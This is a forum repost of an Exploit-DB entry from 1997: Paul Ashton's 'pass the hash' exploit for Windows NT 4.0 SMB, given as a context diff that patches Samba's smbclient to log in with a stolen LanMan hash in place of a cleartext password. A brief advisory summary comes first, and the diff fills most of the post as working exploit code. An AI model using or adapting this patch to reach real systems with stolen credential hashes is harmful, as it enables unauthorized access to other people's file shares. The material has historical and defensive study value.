Exploit Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19197
Проверка EDB
  1. Пройдено
Автор
PAUL ASHTON
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
null
Дата публикации
1997-04-08
Код:
source: https://www.securityfocus.com/bid/233/info

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

Paul Ashton <[email protected]> posted the theory and corresponding exploit code to NTBugtraq. In order for his code to work, you must "exist both in /etc/passwd and /usr/local/samba/private/smbpasswd as the same username and same uid as your rid in NT, and smbclient can read it".

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host. 


*** orig_client.c Tue Apr 8 17:27:29 1997
--- client.c Tue Apr 8 20:57:43 1997
***************
*** 3020,3026 ****
{-1,NULL}
};

-
/****************************************************************************
send a login command
****************************************************************************/
--- 3020,3025 ----
***************
*** 3039,3044 ****
--- 3038,3061 ----
int numprots;
int tries=0;

+ #ifdef USESMBPASSWDFILE
+ /*TODO check for valid password and uid = getuid */
+ BOOL got_encpass;
+ struct passwd *pwd;
+ struct smb_passwd *smb_pass;
+ unsigned char p21[21];
+
+ memset(p21, 0, sizeof p21);
+ pwd = getpwuid(getuid());
+ if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name)))
+ {
+ strcpy(password, "not empty");
+ got_pass = got_encpass = True;
+ memcpy(p21, smb_pass->smb_passwd, 16);
+ }
+ setuid(getuid());
+ #endif
+
if (was_null)
{
inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN);
***************
*** 3189,3194 ****
--- 3205,3215 ----
if (doencrypt && *pass) {
DEBUG(3,("Using encrypted passwords\n"));
passlen = 24;
+
+ #ifdef USESMBPASSWDFILE
+ if (got_encpass) E_P24(p21,cryptkey,pword);
+ else
+ #endif
SMBencrypt(pass,cryptkey,pword);
}
#else
***************
*** 3252,3257 ****
--- 3273,3281 ----
(CVAL(inbuf,smb_rcls) == ERRSRV &&
SVAL(inbuf,smb_err) == ERRbadpw)))
{
+ #ifdef USESMBPASSWDFILE
+ got_encpass =
+ #endif
got_pass = False;
DEBUG(3,("resending login\n"));
goto get_pass;
 
Источник
www.exploit-db.com

Похожие темы